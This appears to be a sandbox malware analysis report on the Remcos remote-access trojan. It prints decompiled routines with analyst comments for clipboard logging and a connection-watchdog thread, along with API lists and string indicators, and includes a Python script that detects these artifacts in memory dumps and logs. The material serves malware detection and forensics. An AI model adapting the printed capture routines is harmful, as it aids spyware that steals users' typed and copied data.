                                        • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                        • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                        • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 31%
                                         			E00406C35(void* __ecx) {
                                         				char _v5;
                                         				char _v24;
                                         				char _v40;
                                         				char* _t13;
                                         				void* _t18;
                                         				void* _t34;
                                         
                                         				_t18 = __ecx;
                                         				// Analyst note: one-time initialisation, guarded by bit 0 of the global at 0x41b8f8.
                                         				if(( *0x41b8f8 & 0x00000001) == 0) {
                                         					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
                                         					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                         					E00413E72(E00406CF4);
                                         				}
                                         				// E00406BEF fills _v24; the log markers below identify it as the current clipboard text.
                                         				E00406BEF(_t18,  &_v24);
                                         				_t13 =  &_v24;
                                         				// std::string operator==: compare with the last value remembered in the global at 0x41b8e8.
                                         				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
                                         				if(_t13 == 0) {
                                         					// Changed: update the remembered value (operator=), then skip logging if the text equals the string at 0x415664 (operator!=).
                                         					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
                                         					_t13 =  &_v24;
                                         					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
                                         					if(_t13 != 0) {
                                         						// Wrap the text between the two clipboard markers and hand it to E004054E9.
                                         						L00414176();
                                         						L00414170();
                                         						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
                                         						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
                                         					}
                                         				}
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         				return _t13;
                                         			}


                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                        Strings
                                        • [End of clipboard text], xrefs: 00406CB8
                                        • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                        • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                        • API String ID: 1191203583-3441917614
                                        • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                        • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                        • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                        • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                         			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
                                         				struct _SYSTEMTIME _v20;
                                         				char _v36;
                                         				void* _v52;
                                         				char* _t25;
                                         				char* _t26;
                                         				intOrPtr _t35;
                                         				void* _t37;
                                         
                                         				_t37 = __ecx;
                                         				// Analyst note: +0x38 is the "timer running" flag; a second call while it is set does nothing.
                                         				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
                                         					__eflags = 0;
                                         					return 0;
                                         				}
                                         				// _a4 is the timeout in seconds (the "%i" in the message); when _a8 is zero the flag at +0x44 is set instead of logging.
                                         				_t35 = _a4;
                                         				if(_a8 != 0) {
                                         					// The message is only printed when the global at 0x41bcac is non-zero.
                                         					__eflags =  *0x41bcac; // 0x0
                                         					if(__eflags != 0) {
                                         						GetLocalTime( &_v20);
                                         						_t25 =  &_a11;
                                         						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
                                         						_t26 =  &_v36;
                                         						L00414170();
                                         						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
                                         						printf(_t26);
                                         						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         					}
                                         				} else {
                                         					 *((char*)(__ecx + 0x44)) = 1;
                                         				}
                                         				// Store the timeout at +0x3c, mark the timer running and start the watchdog thread E004027A2.
                                         				 *((char*)(_t37 + 0x38)) = 1;
                                         				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
                                         				CreateThread(0, 0, E004027A2, _t37, 0, 0);
                                         				return 1;
                                         			}


                                        APIs
                                        • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                        • printf.MSVCRT ref: 004025F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                        • CreateThread.KERNEL32(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                        Strings
                                        • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                        • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                        • API String ID: 3715082883-586133315
                                        • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                        • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                        • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                        • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                        • String ID: alarm.wav
                                        • API String ID: 3304909635-4094641389
                                        • Opcode ID: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                        • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                        • Opcode Fuzzy Hash: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                        • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 44%
                                         			E004027B1(void* __ecx) {
                                         				char _v5;
                                         				struct _SYSTEMTIME _v24;
                                         				char _v40;
                                         				void* _v56;
                                         				char* _t29;
                                         				char* _t30;
                                         				void* _t38;
                                         				intOrPtr _t46;
                                         
                                         				_t38 = __ecx;
                                         				// Analyst note: +0x40 counts elapsed seconds, +0x3c holds the timeout in seconds, +0x39 is a stop flag polled once per second.
                                         				 *((intOrPtr*)(__ecx + 0x40)) = 0;
                                         				if( *((intOrPtr*)(__ecx + 0x3c)) <= 0) {
                                         					L3:
                                         					// Timeout reached without the stop flag: log the warning (if the global at 0x41bcac is non-zero)
                                         					// and call E004020F4, which calls closesocket (see the subcall xrefs further down), i.e. reset the connection.
                                         					if( *((intOrPtr*)(_t38 + 0x39)) == 0) {
                                         						_t46 =  *0x41bcac; // 0x0
                                         						if(_t46 != 0) {
                                         							GetLocalTime( &_v24);
                                         							_t29 =  &_v5;
                                         							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [WARNING] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
                                         							_t30 =  &_v40;
                                         							L00414170();
                                         							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
                                         							_t21 = printf(_t30);
                                         							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         						}
                                         						E004020F4(_t21, _t38);
                                         					}
                                         					L7:
                                         					// Clear the running flag (+0x38) and the stop flag (+0x39) before the thread exits.
                                         					 *((char*)(_t38 + 0x38)) = 0;
                                         					 *((char*)(_t38 + 0x39)) = 0;
                                         					return 0;
                                         				}
                                         				// Poll once per second (Sleep(1000)) until the counter reaches the timeout or the stop flag is set.
                                         				while( *((intOrPtr*)(_t38 + 0x39)) == 0) {
                                         					Sleep(0x3e8);
                                         					 *(_t38 + 0x40) =  *(_t38 + 0x40) + 1;
                                         					_t21 =  *(_t38 + 0x40);
                                         					if( *(_t38 + 0x40) <  *((intOrPtr*)(_t38 + 0x3c))) {
                                         						continue;
                                         					}
                                         					goto L3;
                                         				}
                                         				goto L7;
                                         			}


                                        APIs
                                        • Sleep.KERNEL32(000003E8), ref: 004027D3
                                        • GetLocalTime.KERNEL32(?), ref: 004027F5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [WARNING] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 00402820
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040282B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402835
                                        • printf.MSVCRT ref: 0040283C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402848
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402851
                                        Strings
                                        • Timeout expired, resetting connection., xrefs: 00402815
                                        • %02i:%02i:%02i:%03i [WARNING] , xrefs: 0040281B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [WARNING] $Timeout expired, resetting connection.
                                        • API String ID: 2756237499-4159561219
                                        • Opcode ID: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                        • Instruction ID: eb574a52e8b17308bab00ba60a15c3ae4eff644db24cd51b069feea48370dafb
                                        • Opcode Fuzzy Hash: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                        • Instruction Fuzzy Hash: 95119372900758EFCB11EBA4D9898EFB7B9BB48301740447FFA42E3581E6B5A944C768
                                        Uniqueness

                                        Uniqueness Score: -1.00%
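The three decompiled routines above leave recognisable artifacts: the "Offline Keylogger Started" marker, the two clipboard markers that E00406C35 wraps around each clipboard change, and the "%02i:%02i:%02i:%03i [INFO] " / "[WARNING] " prefix the KeepAlive functions put in front of their messages. The following Python is an added example written for this report, not code from the sample or from the sandbox: it scans a byte buffer (a process memory dump, for instance) for the literal strings seen in this section, parses the timestamped log lines, and pulls clipboard captures out of a recovered log. The " /stext " entry is taken from the GetModuleFileNameW routine that follows, which builds it as a wide string. The memory dump and the log text in the block are constructed for the example; the offsets and names are not from the analysis.

```python
"""Recognise the Remcos logging artifacts decompiled above in a memory dump and in its log output."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Literal strings recovered from the decompiled functions in this section.
# " /stext " is built as a wide (UTF-16LE) string in the binary, so it is encoded that way here.
REMCOS_STRINGS: Dict[str, bytes] = {
    "keylogger_started": b"Offline Keylogger Started",
    "clipboard_begin": b"[Following text has been copied to clipboard:]",
    "clipboard_end": b"[End of clipboard text]",
    "keepalive_enabled": b"KeepAlive Enabled! Timeout: %i seconds",
    "keepalive_expired": b"Timeout expired, resetting connection.",
    "alarm_wav": b"alarm.wav",
    "stext_switch": " /stext ".encode("utf-16-le"),
}


def find_indicators(buf: bytes) -> Dict[str, List[int]]:
    """Return every offset of each indicator string in buf, keyed by indicator name."""
    hits: Dict[str, List[int]] = {}
    for name, needle in REMCOS_STRINGS.items():
        offsets: List[int] = []
        pos = buf.find(needle)
        while pos != -1:
            offsets.append(pos)
            pos = buf.find(needle, pos + 1)
        if offsets:
            hits[name] = offsets
    return hits


# The KeepAlive functions format their messages as "%02i:%02i:%02i:%03i [INFO] " or
# "%02i:%02i:%02i:%03i [WARNING] " followed by the message text.
LOG_LINE = re.compile(r"^(\d{2}):(\d{2}):(\d{2}):(\d{3}) \[(INFO|WARNING)\] (.*)$")


@dataclass
class LogEntry:
    hour: int
    minute: int
    second: int
    millisecond: int
    level: str
    message: str


def parse_log_line(line: str) -> Optional[LogEntry]:
    """Parse one timestamped Remcos log line; return None for anything else."""
    m = LOG_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    h, mi, s, ms, level, msg = m.groups()
    return LogEntry(int(h), int(mi), int(s), int(ms), level, msg)


# E00406C35 wraps each clipboard change as
# "\r\n[Following text has been copied to clipboard:]\r\n" + text + "\r\n[End of clipboard text]\r\n".
CLIPBOARD_BLOCK = re.compile(
    r"\r\n\[Following text has been copied to clipboard:\]\r\n(.*?)\r\n\[End of clipboard text\]\r\n",
    re.S,
)


def extract_clipboard_captures(log_text: str) -> List[str]:
    """Return the clipboard contents recorded in a recovered keylogger log, in order."""
    return CLIPBOARD_BLOCK.findall(log_text)


# Constructed sample dump: filler bytes with a few of the indicators embedded at known offsets.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"Offline Keylogger Started\x00[INFO]\x00"
    + b"\x90" * 16
    + b"\r\n[Following text has been copied to clipboard:]\r\n\x00"
    + b"\r\n[End of clipboard text]\r\n\x00"
    + b"KeepAlive Enabled! Timeout: %i seconds\n\x00"
    + ' /stext "'.encode("utf-16-le")
    + b"\x00" * 32
)

# Constructed sample of what a recovered offline keylogger log might look like.
SAMPLE_LOG = (
    "12:34:56:789 [INFO] KeepAlive Enabled! Timeout: 10 seconds\n"
    "typed text\r\n[Following text has been copied to clipboard:]\r\nhunter2\r\n[End of clipboard text]\r\n"
    "12:35:07:001 [WARNING] Timeout expired, resetting connection.\n"
)

if __name__ == "__main__":
    for name, offs in find_indicators(SAMPLE_DUMP).items():
        print(f"{name}: {[hex(o) for o in offs]}")
    for line in SAMPLE_LOG.splitlines():
        entry = parse_log_line(line)
        if entry:
            print(entry)
    print(extract_clipboard_captures(SAMPLE_LOG))
```

The string scan is deliberately byte-exact rather than regex-based so that it can be dropped into a YARA rule or a memory-forensics plugin unchanged; the clipboard extractor relies on the exact CRLF framing the decompilation shows, so a log that was re-encoded with LF line endings will need its markers normalised first.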

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040AD91
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                          • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                          • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                        • String ID:
                                        • API String ID: 1795822965-0
                                        • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                        • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
